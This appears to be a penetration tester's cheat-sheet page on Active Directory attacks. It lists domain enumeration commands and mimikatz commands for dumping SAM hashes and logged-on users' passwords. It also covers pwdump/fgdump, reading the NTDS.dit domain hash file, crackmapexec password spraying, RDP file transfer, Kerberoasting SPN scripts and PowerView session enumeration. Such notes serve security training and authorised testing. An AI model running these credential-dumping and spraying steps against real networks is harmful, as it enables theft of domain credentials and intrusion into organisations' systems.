Enumeration

​
Users / Groups / Computers
Look for users with high-privs across the domain e.g. Domain Admins or Derivative Local Admins
Look for custom groups.
# get all users in the domain # are there any weird domains? 
cmd> net user /domain
cmd> net user [username] /domain
​
# get all groups in the domain
cmd> net group /domain
cmd> net group [groupname] /domain
​
# get all computers in domain
cmd> net view
cmd> net view /domain
​
# get resources/shares of specified computer
cmd> net view \\[computer_name] /domain
If you can't get all the domain members info, you might want to check the priv (whoami /priv) 
Check the UAC is enabled (if you're not able to execute executables that you uploaded like mimikatz) 
​https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/​
 
Plaintext? (low hanging fruit) > Passwordspray? 
WinPeas may reveal plaintext pass. 
Dumping creds 
if it's not launghed from a SYSTEM, we need to run 
token::elevate after privilege::debuf 
# dump NTLM hashes + plaintext creds
mimikatz > lsadump::sam              # dump contents of SAM db in current host
mimikatz > sekurlsa::logonpasswords  # dump creds of logged-on users
​
Other tools
cmd> pwdump.exe localhost
cmd> fgdump.exe localhost          # improved pwdump, shutdown firewalls 
cmd> type C:\Windows\NTDS\NTDS.dit # all domain hashes in NTDS.dit file on the Domain Controller
Are there any pattens in users passwords? Can we make a password list and do a password spray?
crackmapexec smb IP -u user.txt -p pass.txt --continue-on-success
Then try RDP 
rdesktop -r disk:tmp=/home/kali/transfer -u domain_name\\user_name -p Password IP_+addr
by setting a disk argument, we can see and transfer all the files from the directory as a share. It's super useful.
SPN 
Service Principal Names (AD Service Accounts)
A SPN is a unique name for a service on a host, used to associate with an Active Directory service account.
Enum SPNs to obtain the IP address and port number of apps running on servers integrated with Active Directory.
Query the Domain Controller in search of SPNs.
SPN Examples
CIFS/MYCOMPUTER$ - file share access.
LDAP/MYCOMPUTER$ - querying AD info via. LDAP.
HTTP/MYCOMPUTER$ - Web services such as IIS.
MSSQLSvc/MYCOMPUTER$ - MSSQL.
Perform nslookup of the service hostname -> see if there is an entrypoint here.
Automated SPN enum scripts:
# Kerberoast: https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
PS> .\GetUserSPNs.ps1
​
# Powershell Empire: https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1
PS> .\Get-SPN.ps1
Logged-in users and active user sessions.
More powerview commands https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview​
PS> Set-ExecutionPolicy Unrestricted
PS> Import-Module .\PowerView.ps1
PS> Get-NetLoggedon -ComputerName [computer_name]    # enum logged-in users
PS> Get-NetSession -ComputerName [domain_controller] # enum active user sessions
​
Domain Controller hostname (PdcRoleOwner)**
PS> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
 
​
Active Directory
Lateral movement
Last modified 11mo ago
Enumeration

Plaintext? (low hanging fruit) > Passwordspray?

SPN

​
